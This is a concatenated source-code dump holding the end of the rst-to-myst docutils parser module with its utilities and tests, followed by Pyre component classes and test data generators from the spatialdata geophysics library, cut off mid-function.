for node in self.document.traverse(
lambda n: isinstance(n, (nodes.footnote, nodes.citation))
):
if node.children and isinstance(node.children[0], nodes.label):
node.pop(0)
ENUM_CONVERTERS = {
"arabic": (lambda i: i),
"lowerroman": (lambda i: roman.toRoman(i).lower()),
"upperroman": (lambda i: roman.toRoman(i).upper()),
"loweralpha": (lambda i: chr(ord("a") + i - 1)),
"upperalpha": (lambda i: chr(ord("a") + i - 1).upper()),
}
class ResolveListItems(Transform):
"""For bullet/enumerated lists, propagate attributes to their child list items.
Also decide if they are loose/tight::
A list is loose if any of its list items are separated by blank lines,
or if any of its list items directly contain two block-level elements
with a blank line between them. Otherwise a list is tight.
"""
def apply(self):
for node in self.document.traverse(nodes.bullet_list):
prefix = node["bullet"] + " "
for child in node.children:
if isinstance(child, nodes.list_item):
child["style"] = "bullet"
child["prefix"] = prefix
for node in self.document.traverse(nodes.enumerated_list):
number = 1
if "start" in node:
number = node["start"]
# TODO markdown-it only supports numbers
# prefix = node["prefix"]
# suffix = node["suffix"]
# convert = ENUM_CONVERTERS[node["enumtype"]]
for child in node.children:
if isinstance(child, nodes.list_item):
child["style"] = "enumerated"
child["prefix"] = f"{number}. "
number += 1
class FrontMatter(Transform):
"""Extract an initial field list into a `FrontMatterNode`.
Similar to ``docutils.transforms.frontmatter.DocInfo``.
"""
def apply(self):
if not self.document.settings.front_matter:
return
index = self.document.first_child_not_matching_class(nodes.PreBibliographic)
if index is None:
return
candidate = self.document[index]
if isinstance(candidate, nodes.section):
index = candidate.first_child_not_matching_class(nodes.PreBibliographic)
if index is None:
return
candidate = candidate[index]
if isinstance(candidate, nodes.field_list):
front_matter = FrontMatterNode("", *candidate.children)
candidate.replace_self(front_matter)
def to_docutils_ast(
text: str,
uri: str = "source",
report_level=2,
halt_level=4,
warning_stream=None,
language_code="en",
use_sphinx=True,
extensions=(),
default_domain="py",
conversions=None,
front_matter=True,
) -> Tuple[nodes.document, StringIO]:
settings = OptionParser(components=(LosslessRSTParser,)).get_default_values()
warning_stream = StringIO() if warning_stream is None else warning_stream
settings.warning_stream = warning_stream
settings.report_level = report_level # 2=warning
settings.halt_level = halt_level # 4=severe
# The level at or above which `SystemMessage` exceptions
# will be raised, halting execution.
settings.language_code = language_code
document = new_document(uri, settings=settings)
# compile lookup for directives/roles
namespace = compile_namespace(
language_code=language_code,
use_sphinx=use_sphinx,
extensions=extensions,
default_domain=default_domain,
)
document.settings.namespace = namespace
# get conversion lookup for directives
directive_data = yaml.safe_load(
files(package_data).joinpath("directives.yml").read_text("utf8")
)
if conversions:
directive_data.update(conversions)
document.settings.directive_data = directive_data
# whether to treat initial field list as front matter
document.settings.front_matter = front_matter
parser = LosslessRSTParser()
parser.parse(text, document)
# these three transforms are required for converting targets correctly
for transform_cls in [
PropagateTargets, # Propagate empty internal targets to the next element. (260)
FrontMatter, # convert initial field list (DocInfo=340)
AnonymousHyperlinks, # Link anonymous references to targets. (440)
# IndirectHyperlinks, # "refuri" migrated back to all indirect targets (460)
Footnotes, # Assign numbers to autonumbered footnotes (620)
# bespoke transforms
StripFootnoteLabel,
ResolveListItems,
]:
transform = transform_cls(document)
transform.apply()
return document, warning_stream
```
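A usage sketch mirroring how the package's test suite drives this parser:
```python
from rst_to_myst import to_docutils_ast
rst = "Title\n=====\n\nSome *text* with a :math:`x^2` role.\n"
document, warning_stream = to_docutils_ast(rst)
print(document.pformat())          # lossless docutils AST, roles left unrun
print(warning_stream.getvalue())   # accumulated parser warnings, if any
```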
#### File: rst-to-myst/rst_to_myst/utils.py
```python
from pathlib import Path
import yaml
def read_fixture_file(path):
text = Path(path).read_text(encoding="utf-8")
tests = []
section = 0
last_pos = 0
lines = text.splitlines(keepends=True)
for i in range(len(lines)):
if lines[i].rstrip() == ".":
if section == 0:
tests.append([i, lines[i - 1].strip()])
section = 1
elif section == 1:
tests[-1].append("".join(lines[last_pos + 1 : i]))
section = 2
elif section == 2:
tests[-1].append("".join(lines[last_pos + 1 : i]))
section = 0
last_pos = i
return tests
def represent_str(dumper, data):
# borrowed from http://stackoverflow.com/a/33300001
if len(data.splitlines()) > 1:
return dumper.represent_scalar("tag:yaml.org,2002:str", data, style="|")
return dumper.represent_scalar("tag:yaml.org,2002:str", data)
class YamlDumper(yaml.SafeDumper):
pass
YamlDumper.add_representer(str, represent_str)
def yaml_dump(data, sort_keys: bool = True):
return yaml.dump(data, Dumper=YamlDumper, sort_keys=sort_keys)
```
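The fixture layout `read_fixture_file` expects is implied by its parsing loop: a title line, a lone `.`, the input block, another `.`, the expected block, and a closing `.`. A sketch (the file path and contents are illustrative):
```python
# Hypothetical fixture file:
#
#   simple paragraph     <- title (the line before the first ".")
#   .
#   Some *rst* input.
#   .
#   Expected output.
#   .
#
# Each entry is [dot line index, title, input block, expected block]:
tests = read_fixture_file("tests/fixtures/ast.txt")
line, title, rst, expected = tests[0]
```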
#### File: rst-to-myst/tests/test_cli.py
```python
from pathlib import Path
from click.testing import CliRunner
from rst_to_myst import cli
def test_directives_list():
runner = CliRunner()
result = runner.invoke(cli.directives_list, [])
assert result.exit_code == 0, result.output
assert "admonition" in result.output
def test_roles_list():
runner = CliRunner()
result = runner.invoke(cli.roles_list, [])
assert result.exit_code == 0
assert "acronym" in result.output
def test_directives_show():
runner = CliRunner()
result = runner.invoke(cli.directives_show, ["admonition"])
assert result.exit_code == 0
assert "directives.admonitions.Admonition" in result.output
def test_directives_show_translate():
runner = CliRunner()
result = runner.invoke(cli.directives_show, ["-l", "fr", "astuce"])
assert result.exit_code == 0
assert "directives.admonitions.Tip" in result.output
def test_roles_show():
runner = CliRunner()
result = runner.invoke(cli.roles_show, ["acronym"])
assert result.exit_code == 0
assert "rst.roles" in result.output
def test_ast():
runner = CliRunner()
result = runner.invoke(cli.ast, ["-"], input=":name:`content`")
assert result.exit_code == 0, result.output
assert '<RoleNode role="name" text="content">' in result.output
def test_tokens():
runner = CliRunner()
result = runner.invoke(cli.tokens, ["-"], input=":name:`content`")
assert result.exit_code == 0, result.output
assert "paragraph_open" in result.output
def test_stream():
runner = CliRunner()
result = runner.invoke(cli.stream, ["-"], input=":name:`content`")
assert result.exit_code == 0, result.output
assert "{name}`content`" in result.output
def test_convert(tmp_path: Path, file_regression):
tmp_path.joinpath("test.rst").write_text(
"head\n====\n\ncontent `a`\n", encoding="utf8"
)
tmp_path.joinpath("config.yaml").write_text("default_role: math\n", encoding="utf8")
runner = CliRunner()
result = runner.invoke(
cli.convert,
[
"--config",
str(tmp_path.joinpath("config.yaml")),
str(tmp_path.joinpath("test.rst")),
],
)
assert result.exit_code == 0, result.output
assert tmp_path.joinpath("test.md").exists()
file_regression.check(
tmp_path.joinpath("test.md").read_text(encoding="utf8"),
encoding="utf8",
extension=".md",
)
```
#### File: rst-to-myst/tests/test_fixtures.py
```python
from pathlib import Path
import pytest
from rst_to_myst import rst_to_myst, to_docutils_ast
from rst_to_myst.utils import read_fixture_file
FIXTURE_PATH = Path(__file__).parent.joinpath("fixtures")
@pytest.mark.parametrize(
"line,title,rst,expected",
read_fixture_file(FIXTURE_PATH / "ast.txt"),
ids=[f"{i[0]}-{i[1]}" for i in read_fixture_file(FIXTURE_PATH / "ast.txt")],
)
def test_ast(line, title, rst, expected):
document, warning_stream = to_docutils_ast(rst)
text = document.pformat()
try:
assert warning_stream.getvalue() == ""
assert text.rstrip() == expected.rstrip()
except AssertionError:
print(text)
raise
@pytest.mark.parametrize(
"line,title,rst,expected",
read_fixture_file(FIXTURE_PATH / "render.txt"),
ids=[f"{i[0]}-{i[1]}" for i in read_fixture_file(FIXTURE_PATH / "render.txt")],
)
def test_render(line, title, rst, expected):
output = rst_to_myst(rst)
try:
assert output.warning_stream.getvalue() == ""
assert output.text.rstrip() == expected.rstrip()
except AssertionError:
print(output.text)
raise
@pytest.mark.parametrize(
"line,title,rst,expected",
read_fixture_file(FIXTURE_PATH / "render_extra.txt"),
ids=[
f"{i[0]}-{i[1]}" for i in read_fixture_file(FIXTURE_PATH / "render_extra.txt")
],
)
def test_render_extra(line, title, rst, expected):
output = rst_to_myst(rst)
try:
assert output.warning_stream.getvalue() == ""
assert output.text.rstrip() == expected.rstrip()
except AssertionError:
print(output.text)
raise
```
|
{
"source": "jedbrown/spatialdata",
"score": 3
}
|
#### File: spatialdata/geocoords/CoordSys.py
```python
from pyre.components.Component import Component
# CoordSys class
class CoordSys(Component):
"""
Python manager for coordinate systems.
Factory: coordsys
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(Component.Inventory):
"""Python object for managing CoordSys facilities and properties."""
## @class Inventory
## Python object for managing CoordSys facilities and properties.
##
## \b Properties
## @li None
##
## \b Facilities
## @li None
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="coordsys"):
"""
Constructor.
"""
Component.__init__(self, name, facility="coordsys")
self._createModuleObj()
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Setup members using inventory.
"""
Component._configure(self)
return
def _createModuleObj(self):
"""
Create Python module object.
"""
raise NotImplementedError("_createModuleObj() not implemented.")
return
# FACTORIES ////////////////////////////////////////////////////////////
def coordsys():
"""
Factory associated with CoordSys.
"""
return CoordSys()
# End of file
```
#### File: spatialdata/spatialdb/CompositeDB.py
```python
from SpatialDBObj import SpatialDBObj
from spatialdb import CompositeDB as ModuleCompositeDB
# CompositeDB class
class CompositeDB(SpatialDBObj, ModuleCompositeDB):
"""
    Python manager for a spatial database that composites values from two other spatial databases.
Factory: spatial_database
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(SpatialDBObj.Inventory):
"""
Python object for managing CompositeDB facilities and properties.
"""
## @class Inventory
## Python object for managing CompositeDB facilities and properties.
##
## \b Properties
## @li \b values_A Names of values to query with database A
## @li \b values_B Names of values to query with database B
##
## \b Facilities
## @li \b db_A Spatial database A
## @li \b db_B Spatial database B
import pyre.inventory
namesA = pyre.inventory.list("values_A", default=[])
namesA.meta['tip'] = "Names of values to query with database A."
namesB = pyre.inventory.list("values_B", default=[])
namesB.meta['tip'] = "Names of values to query with database B."
from UniformDB import UniformDB
dbA = pyre.inventory.facility("db_A", factory=UniformDB,
family="spatial_database")
dbA.meta['tip'] = "Spatial database A."
dbB = pyre.inventory.facility("db_B", factory=UniformDB,
family="spatial_database")
dbB.meta['tip'] = "Spatial database B."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="compositedb"):
"""
Constructor.
"""
SpatialDBObj.__init__(self, name)
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Set members based on inventory.
"""
SpatialDBObj._configure(self)
self._validateParameters(self.inventory)
self.dbA(self.inventory.dbA, self.inventory.namesA)
self.dbB(self.inventory.dbB, self.inventory.namesB)
return
def _createModuleObj(self):
"""
Create Python module object.
"""
ModuleCompositeDB.__init__(self)
return
def _validateParameters(self, data):
"""
Validate parameters.
"""
        if (0 == len(data.namesA)):
            raise ValueError(
                "Error in spatial database '%s'\n"
                "Names of values to query in database A not set."
                % self.label)
        if (0 == len(data.namesB)):
            raise ValueError(
                "Error in spatial database '%s'\n"
                "Names of values to query in database B not set."
                % self.label)
return
# FACTORIES ////////////////////////////////////////////////////////////
def spatial_database():
"""
Factory associated with CompositeDB.
"""
return CompositeDB()
# End of file
```
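A configuration sketch following the inventory pattern used in the package's unit tests; the import path and value names are illustrative:
```python
# Illustrative values; mirrors the tests' use of inventory attributes
# followed by _configure().
from spatialdata.spatialdb.CompositeDB import CompositeDB
db = CompositeDB()
db.inventory.namesA = ["density"]    # values answered by database A
db.inventory.namesB = ["vs", "vp"]   # values answered by database B
db._configure()                      # validates the names and wires dbA/dbB
```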
#### File: spatialdb/generator/Geometry.py
```python
from pyre.components.Component import Component
# Dummy class for empty component
class Dummy(Component):
def __init__(self):
Component.__init__(self, name="dummy", facility="dummy")
return
# Geometry class
class Geometry(Component):
"""
Python manager for geometry used in generating database.
Factory: geometry.
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(Component.Inventory):
"""
Python object for managing Geometry facilities and properties.
"""
## @class Inventory
## Python object for managing Geometry facilities and properties.
##
## \b Properties
## @li \b data_dim Spatial dimension of database locations.
##
## \b Facilities
## @li \b reader Object to read geometry
## @li \b coordsys Coordinate system of geometry
import pyre.inventory
dataDim = pyre.inventory.int("data_dim", default=2)
dataDim.validator = pyre.inventory.choice([0, 1, 2, 3])
dataDim.meta['tip'] = "Spatial dimension of database locations."
reader = pyre.inventory.facility("reader", family="reader",
factory=Dummy)
reader.meta['tip'] = "Object to read geometry."
from spatialdata.geocoords.CSCart import CSCart
coordsys = pyre.inventory.facility("coordsys", family="coordsys",
factory=CSCart)
coordsys.meta['tip'] = "Coordinate system for database."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="geometry"):
"""
Constructor.
"""
Component.__init__(self, name, facility="geometry")
self.vertices = None
return
def read(self):
"""
Read geometry.
"""
self.vertices = self.reader.read()
self.coordsys.initialize()
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Setup members using inventory.
"""
Component._configure(self)
self.dataDim = self.inventory.dataDim
self.reader = self.inventory.reader
self.coordsys = self.inventory.coordsys
return
# FACTORIES ////////////////////////////////////////////////////////////
def geometry():
"""
Factory associated with Geometry.
"""
return Geometry()
# End of file
```
#### File: spatialdata/spatialdb/SCECCVMH.py
```python
from SpatialDBObj import SpatialDBObj
from spatialdb import SCECCVMH as ModuleSCECCVMH
# SCECCVMH class
class SCECCVMH(SpatialDBObj, ModuleSCECCVMH):
"""
    Python manager for the spatial database interface to the SCEC CVM-H seismic velocity model.
Factory: spatial_database
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(SpatialDBObj.Inventory):
"""
Python object for managing SCECCVMH facilities and properties.
"""
## @class Inventory
## Python object for managing SCECCVMH facilities and properties.
##
## \b Properties
## @li \b data_dir Directory containing SCEC CVM-H data files.
## @li \b min_vs Minimum shear wave speed.
## @li \b squash Squash topography/bathymetry to sea level.
## @li \b squash_limit Elevation above which topography is squashed.
##
## \b Facilities
## @li none
import pyre.inventory
dataDir = pyre.inventory.str("data_dir", default=".")
dataDir.meta['tip'] = "Directory containing SCEC CVM-H data files."
from pyre.units.length import meter
from pyre.units.time import second
minVs = pyre.inventory.dimensional("min_vs", default=500.0*meter/second)
minVs.meta['tip'] = "Minimum shear wave speed."
squash = pyre.inventory.bool("squash", default=False)
squash.meta['tip'] = "Squash topography/bathymetry to sea level."
from pyre.units.length import km
squashLimit = pyre.inventory.dimensional("squash_limit",
default=-2.0*km)
squashLimit.meta['tip'] = "Elevation above which topography is squashed."
label = pyre.inventory.str("label", default="SCEC CVM-H")
label.meta['tip'] = "Descriptive label for seismic velocity model."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="sceccvmh"):
"""
Constructor.
"""
SpatialDBObj.__init__(self, name)
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Set members based on inventory.
"""
SpatialDBObj._configure(self)
self.label("SCEC CVM-H")
self.dataDir(self.inventory.dataDir)
self.minVs(self.inventory.minVs.value)
self.squash(self.inventory.squash, self.inventory.squashLimit.value)
return
def _createModuleObj(self):
"""
Create Python module object.
"""
ModuleSCECCVMH.__init__(self)
return
# FACTORIES ////////////////////////////////////////////////////////////
def spatial_database():
"""
Factory associated with SCECCVMH.
"""
return SCECCVMH()
# End of file
```
#### File: spatialdata/spatialdb/SimpleDB.py
```python
from SpatialDBObj import SpatialDBObj
from spatialdb import SimpleDB as ModuleSimpleDB
# SimpleDB class
class SimpleDB(SpatialDBObj, ModuleSimpleDB):
"""
Python manager for simple spatial database.
Factory: spatial_database
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(SpatialDBObj.Inventory):
"""
Python object for managing SimpleDB facilities and properties.
"""
## @class Inventory
## Python object for managing SimpleDB facilities and properties.
##
## \b Properties
## @li query-type Type of query to perform
##
## \b Facilities
## @li \b iohandler I/O handler for database
import pyre.inventory
queryType = pyre.inventory.str("query_type", default="nearest")
queryType.validator = pyre.inventory.choice(["nearest", "linear"])
queryType.meta['tip'] = "Type of query to perform."
from SimpleIOAscii import SimpleIOAscii
iohandler = pyre.inventory.facility("iohandler", family="simpledb_io",
factory=SimpleIOAscii)
iohandler.meta['tip'] = "I/O handler for database."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="simpledb"):
"""
Constructor.
"""
SpatialDBObj.__init__(self, name)
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Set members based on inventory.
"""
SpatialDBObj._configure(self)
self.ioHandler(self.inventory.iohandler)
self.queryType(self._parseQueryString(self.inventory.queryType))
return
def _createModuleObj(self):
"""
Create Python module object.
"""
ModuleSimpleDB.__init__(self)
return
def _parseQueryString(self, label):
if label.lower() == "nearest":
value = ModuleSimpleDB.NEAREST
elif label.lower() == "linear":
value = ModuleSimpleDB.LINEAR
else:
raise ValueError("Unknown value for query type '%s'." % label)
return value
# FACTORIES ////////////////////////////////////////////////////////////
def spatial_database():
"""
Factory associated with SimpleDB.
"""
return SimpleDB()
# End of file
```
#### File: spatialdata/spatialdb/SimpleIO.py
```python
from pyre.components.Component import Component
# Validator for filename
def validateFilename(value):
"""
Validate filename.
"""
if 0 == len(value):
raise ValueError("Filename for spatial database not specified.")
return value
# SimpleIO class
class SimpleIO(Component):
"""
Python I/O manager for simple database (SimpleDB).
Factory: simpledb_io
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(Component.Inventory):
"""
Python object for managing SimpleIO facilities and properties.
"""
## @class Inventory
## Python object for managing SimpleIO facilities and properties.
##
## \b Properties
## @li \b filename Name of database file
##
## \b Facilities
## @li None
import pyre.inventory
filename = pyre.inventory.str("filename", default="",
validator=validateFilename)
filename.meta['tip'] = "Name of database file."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="simpleio"):
"""
Constructor.
"""
Component.__init__(self, name, facility="simpledb_io")
self._createModuleObj()
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Set members using inventory.
"""
        try:
            Component._configure(self)
            self.filename(self.inventory.filename)
        except ValueError as err:
            aliases = ", ".join(self.aliases)
            raise ValueError("Error while configuring spatial database reader "
                             "(%s):\n%s" % (aliases, err))
return
def _createModuleObj(self):
"""
Create Python module object.
"""
raise NotImplementedError("_createModuleObj() not implemented.")
return
def _validateData(self, data):
"""
Check consistency of database data.
"""
(numLocs, spaceDim) = data['points'].shape
cs = data['coordsys']
if spaceDim != cs.spaceDim():
raise ValueError("Simple database '%s' space-dim (%d) does not agree with spatial "\
"dimension of coordinate system (%d)." % \
(self.label, spaceDim, cs.spaceDim()))
return
# FACTORIES ////////////////////////////////////////////////////////////
def simpledb_io():
"""
Factory associated with SimpleIO.
"""
return SimpleIO()
# End of file
```
#### File: spatialdata/spatialdb/TimeHistory.py
```python
from pyre.components.Component import Component
from spatialdb import TimeHistory as ModuleTimeHistory
# TimeHistory class
class TimeHistory(Component, ModuleTimeHistory):
"""
Python object for time history dependence with spatial databases.
\b Properties
@li \b label Label for time history.
@li \b filename Name of file for time history.
\b Facilities
@li None
Factory: temporal_database
"""
import pyre.inventory
label = pyre.inventory.str("label", default="temporal database")
label.meta['tip'] = "Label for time history."
filename = pyre.inventory.str("filename", default="timehistory.timedb")
filename.meta['tip'] = "Name of file for time history."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="timehistory"):
"""
Constructor.
"""
Component.__init__(self, name, facility="temporal_database")
self._createModuleObj()
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Set attributes based on inventory.
"""
Component._configure(self)
ModuleTimeHistory.label(self, self.inventory.label)
ModuleTimeHistory.filename(self, self.inventory.filename)
return
def _createModuleObj(self):
"""
Create Python module object.
"""
ModuleTimeHistory.__init__(self)
return
# FACTORIES ////////////////////////////////////////////////////////////
def temporal_database():
"""
Factory associated with TimeHistory.
"""
return TimeHistory()
# End of file
```
#### File: spatialdata/units/NondimElasticQuasistatic.py
```python
from Nondimensional import Nondimensional
# NondimElasticQuasistatic class
class NondimElasticQuasistatic(Nondimensional):
"""
Python manager for nondimensionalizing quasi-static elasticity problems.
Factory: nondimensional
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(Nondimensional.Inventory):
"""
Python object for managing NondimElasticQuasistatic facilities and
properties.
"""
# @class Inventory
# Python object for managing NondimElasticQuasistatic facilities and
# properties.
##
# \b Properties
# @li \b shear_modulus Shear modulus to nondimensionalize pressure.
# @li \b length_scale Value to nondimensionalize length scale.
# @li \b relaxation_time Relaxation time to nondimensionalize time.
##
# \b Facilities
# @li None
import pyre.inventory
from pyre.units.length import meter
lengthScale = pyre.inventory.dimensional("length_scale", default=1.0e+3 * meter,
validator=pyre.inventory.greater(0.0 * meter))
lengthScale.meta['tip'] = "Value to nondimensionalize length scale."
from pyre.units.pressure import pascal
shearModulus = pyre.inventory.dimensional("shear_modulus", default=3.0e+10 * pascal,
validator=pyre.inventory.greater(0.0 * pascal))
shearModulus.meta['tip'] = "Shear modulus to nondimensionalize pressure."
from pyre.units.time import year
relaxationTime = pyre.inventory.dimensional("relaxation_time", default=100.0 * year,
validator=pyre.inventory.greater(0.0 * year))
relaxationTime.meta['tip'] = "Relaxation time to nondimensionalize time."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="nondimelasticquasistatic"):
"""
Constructor.
"""
Nondimensional.__init__(self, name)
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Setup members using inventory.
"""
Nondimensional._configure(self)
self.setLengthScale(self.inventory.lengthScale)
self.setPressureScale(self.inventory.shearModulus)
self.setTimeScale(self.inventory.relaxationTime)
self.computeDensityScale()
return
# FACTORIES ////////////////////////////////////////////////////////////
def nondimensional():
"""
Factory associated with NondimElasticQuasistatic.
"""
return NondimElasticQuasistatic()
# End of file
```
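A numerical sketch of the scales this component sets. It assumes `computeDensityScale()` derives density as pressure · time² / length², an assumption consistent with the units (Pa · s² / m² = kg / m³):
```python
# Assumption: computeDensityScale() derives density as
# pressure * time**2 / length**2 (Pa * s**2 / m**2 = kg / m**3).
from pyre.units.length import meter
from pyre.units.pressure import pascal
from pyre.units.time import second
length = 1.0e+3 * meter
pressure = 3.0e+10 * pascal          # the default shear modulus
time = 3.15576e+9 * second           # ~100 years, the default relaxation time
density = pressure * time**2 / length**2   # ~3.0e+23 kg/m**3
```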
#### File: spatialdb/tests/testcontrib.py
```python
import unittest
def suite():
suite = unittest.TestSuite()
from TestUniformVelModel import TestUniformVelModel
suite.addTest(unittest.makeSuite(TestUniformVelModel))
return suite
def main():
unittest.TextTestRunner(verbosity=2).run(suite())
return
if __name__ == '__main__':
main()
# End of file
```
#### File: templates/spatialdb/UniformVelModel.py
```python
from spatialdata.spatialdb.SpatialDBObj import SpatialDBObj
from spatialdbcontrib import UniformVelModel as ModuleUniformVelModel
# UniformVelModel class
class UniformVelModel(SpatialDBObj, ModuleUniformVelModel):
"""
    Python object associated with the C++ UniformVelModel object. This
    object provides a Pyre interface to the C++ object. It inherits
    from the generic SpatialDBObj and the UniformVelModel SWIG module
    object. This ensures that this object has all of the SpatialDBObj
    Pyre properties and facilities, and that function calls to the
    underlying C++ code are passed on to the SWIG Python module.
Factory: spatial_database
"""
# INVENTORY //////////////////////////////////////////////////////////
class Inventory(SpatialDBObj.Inventory):
"""
Python object for managing UniformVelModel Pyre facilities and properties.
## \b Properties
## @li \b vs S wave speed.
## @li \b vp P wave speed.
## @li \b density Density.
##
## \b Facilities
## @li none
"""
import pyre.inventory
# Units used in properties
from pyre.units.time import s
from pyre.units.length import km,m
from pyre.units.mass import kg
# Pyre properties have the form
#
# VARIABLE = pyre.inventory.TYPE("CFG_NAME", default=DEFAULT_VALUE)
# VARIABLE.meta['tip'] = "HELP STRING"
#
# where VARIABLE is a variable used to refer to the Pyre property,
# TYPE of the type of property (dimensional, str, float, int,
# etc), CFG_NAME is the name used in the Pyre .cfg files and the
# command line, and DEFAULT_VALUE is the default value.
#
# When a Pyre property is a dimensional scalar quantity, use the
# dimensional type for properties and Pyre will automatically
# check to make sure user-specified quantities have compatible
# units and convert the value to SI units.
#
# The help string will be printed when the user uses the command
        # line arguments --FULL_COMPONENT_NAME.help-properties or
# --FULL_COMPONENT.help-components. See the PyLith manual chapter
# "Running PyLith" for more information regarding getting help
# using command line arguments.
#
# Create a Pyre property named vs with a default value of 2.6 km/s.
vs = pyre.inventory.dimensional("vs", default=2.6*km/s)
vs.meta['tip'] = "S wave speed."
# Create a Pyre property named vp with a default value of 4.5 km/s.
vp = pyre.inventory.dimensional("vp", default=4.5*km/s)
vp.meta['tip'] = "P wave speed."
# Create a Pyre property named density with a default value of 2500 kg/m**3.
density = pyre.inventory.dimensional("density", default=2.5e+3*kg/m**3)
density.meta['tip'] = "Density."
# PUBLIC METHODS /////////////////////////////////////////////////////
def __init__(self, name="uniformvelmodel"):
"""
Constructor. This function is called automatically when the Python
UniformVelModel object is created.
"""
SpatialDBObj.__init__(self, name)
return
# PRIVATE METHODS ////////////////////////////////////////////////////
def _configure(self):
"""
Set members based on inventory. This function is called
automatically when the component is setup.
"""
SpatialDBObj._configure(self) # Call parent function.
# Transfer inventory to C++ object
ModuleUniformVelModel.vs(self, self.inventory.vs.value)
ModuleUniformVelModel.vp(self, self.inventory.vp.value)
ModuleUniformVelModel.density(self, self.inventory.density.value)
return
def _createModuleObj(self):
"""
Create handle to C++ object. This function is called by the
generic SpatialDBObj constructor. The name cannot be changed and
no arguments can be added.
"""
# Create the SWIG module object to provide access to the C++ object.
ModuleUniformVelModel.__init__(self)
return
# FACTORIES ////////////////////////////////////////////////////////////
# Factory used when setting UniformVelModel to a Pyre 'spatial_database' facility.
def spatial_database():
"""
Factory associated with UniformVelModel.
"""
return UniformVelModel()
# End of file
```
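A minimal sketch of overriding these Pyre properties programmatically, mirroring the `inventory`/`_configure()` pattern used in the package's tests; the wave speeds are illustrative:
```python
# Illustrative values; mirrors the inventory/_configure() pattern from
# the package's unit tests.
from pyre.units.time import s
from pyre.units.length import km
vm = UniformVelModel()
vm.inventory.vs = 3.2*km/s
vm.inventory.vp = 5.6*km/s
vm._configure()   # pushes the values into the underlying C++ object
```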
#### File: geocoords/data/ConvertDataApp.py
```python
from pyre.applications.Script import Script
# ConvertDataApp class
class ConvertDataApp(Script):
"""Python application to generate data for coordinate conversion tests."""
def main(self, *args, **kwds):
"""Run application."""
data = self.inventory.data
data.calculate()
data.dump(self.inventory.dumper)
return
def __init__(self):
"""Constructor."""
Script.__init__(self, 'convertdataapp')
return
class Inventory(Script.Inventory):
## @class Inventory
## Python object for managing ConvertDataApp facilities and properties.
##
## \b Properties
## @li None
##
## \b Facilities
## @li \b data Data generator for coordinate transformation test
## @li \b dumper Dump data to file
import pyre.inventory
from spatialdata.utils.CppData import CppData
from ConvertData import ConvertData
data = pyre.inventory.facility('data', factory=ConvertData)
dumper = pyre.inventory.facility('dumper', factory=CppData)
# main
if __name__ == '__main__':
app = ConvertDataApp()
app.run()
# End of file
```
#### File: spatialdb/data/SimpleDBTestDataLine3D.py
```python
import numpy
from SimpleDBApp import SimpleDBApp
# SimpleDBDataLine3D class
class SimpleDBDataLine3D(SimpleDBApp):
"""
Python data generator for tests of C++ SimpleDB using
data with linear 3-D spatial distribution.
"""
def _compute(self):
"""
Compute query data.
"""
# Database information
self.numLocs = 5
self.numVals = 2
self.spaceDim = 3
self.names = [ "One", "Two" ]
self.units = [ "m", "m" ]
self.dataDim = 1
self.dbCoords = None
self.dbData = None
# Query information
self.numQueries = 4
self.queryNearest = numpy.array( [[4.5, 2.3, 4.0, 6.3, 7.4],
[3.2, 7.4, 5.8, 6.3, 7.4],
[4.0, 9.8, 5.7, 6.3, 7.4]],
dtype=numpy.float64)
self.queryLinear = numpy.array( [[2.9, 3.4, 8.7, 6.3, 7.4],
[2.2, 9.0, 8.5, 6.3, 7.4],
[0.2, 5.8, 6.6, 6.3, 7.4]],
dtype=numpy.float64)
self.errFlags = numpy.array( [ 0, 0, 1, 0 ], dtype=numpy.int32)
tdata = [ {'t': 0.0, 'one': 0.1, 'two': 1.1},
{'t': 1.0, 'one': 0.3, 'two': 3.3},
{'t': 1.5, 'one': 0.2, 'two': 2.2},
{'t': 2.0, 'one': 0.1, 'two': 1.1},
{'t': 5.0, 'one': -0.4, 'two': -4.4} ]
qtdata = [ {'t': 1.0, 'ni': 1, 'wts': [{'i': 1, 'w': 1.0}] },
{'t': 4.0, 'ni': 4, 'wts': [{'i': 3, 'w': 1.0/3.0},
{'i': 4, 'w': 2.0/3.0} ] },
{'t': 6.0, 'ni': 4, 'wts': [{'i': 3, 'w': 0.0},
{'i': 4, 'w': 0.0} ] },
{'t': 1.2, 'ni': 1, 'wts': [{'i': 1, 'w': 0.6},
{'i': 2, 'w': 0.4}]} ]
o = numpy.array([3.4, 9.5, 8.7], dtype=numpy.float64)
a = numpy.array([2.3, 0.4, 9.8], dtype=numpy.float64)
self.dbCoords = numpy.zeros( (self.numLocs, self.spaceDim),
dtype=numpy.float64)
self.dbData = numpy.zeros( (self.numLocs, self.numVals),
dtype=numpy.float64)
iLoc = 0
for loc in tdata:
xyz = o + a*loc['t']
self.dbCoords[iLoc, :] = numpy.array([xyz[0], xyz[1], xyz[2]],
dtype=numpy.float64)
self.dbData[iLoc, :] = numpy.array([loc['one'], loc['two']],
dtype=numpy.float64)
iLoc += 1
self.queryNearest = numpy.zeros( (self.numQueries,
self.spaceDim+self.numVals),
dtype=numpy.float64)
self.queryLinear = numpy.zeros( (self.numQueries,
self.spaceDim+self.numVals),
dtype=numpy.float64)
iLoc = 0
for qloc in qtdata:
